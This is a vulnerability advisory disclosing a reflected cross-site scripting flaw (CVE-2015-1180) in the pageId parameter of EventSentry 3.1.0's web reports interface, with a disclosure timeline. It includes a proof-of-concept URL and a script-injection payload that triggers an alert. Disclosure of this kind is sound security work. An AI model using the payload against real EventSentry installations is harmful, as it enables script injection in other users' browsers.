EventSentry 3.1.0 Cross Site Scripting

`CVE-2015-1180-xss-eventsentry  
  
  
Information  
----------------  
Advisory by Octogence.  
Name: Reflected XSS Vulnerability in EventSentry Web Reports Interface  
Affected Software : EventSentry  
Affected Versions: 3.1.0 and possibly below  
Vendor Homepage : http://eventsentry.com/  
Vulnerability Type : Cross-site Scripting  
Severity : High  
CVE ID: CVE-2015-1180  
  
Impact  
----------  
An attacker can craft a URL with malicious JavaScript code which  
executes in the browser.  
  
Technical Details  
------------------------  
Sample URL:  
  
http://localhost/networktile/bullet?id=3&pageId=’><script>alert(21)<%2fscript>97dd5&dashboard=3  
  
Parameter:  
pageId  
  
Sample Payload:  
‘><script>alert(21)</script>  
  
For more information on cross-site scripting vulnerabilities read the  
following article:  
  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
  
Advisory Timeline (mm/dd/yyyy)  
-----------------------------------------------  
08/12/2014 – Reported  
01/02/2015 – Vulnerability Fixed  
01/22/2015 – Advisory Released  
  
  
--   
Regards  
Sudhanshu  
  
Octogence Tech Solutions  
Noida, India  
Mobile | +91-9971658929  
Website| www.octogence.com  
`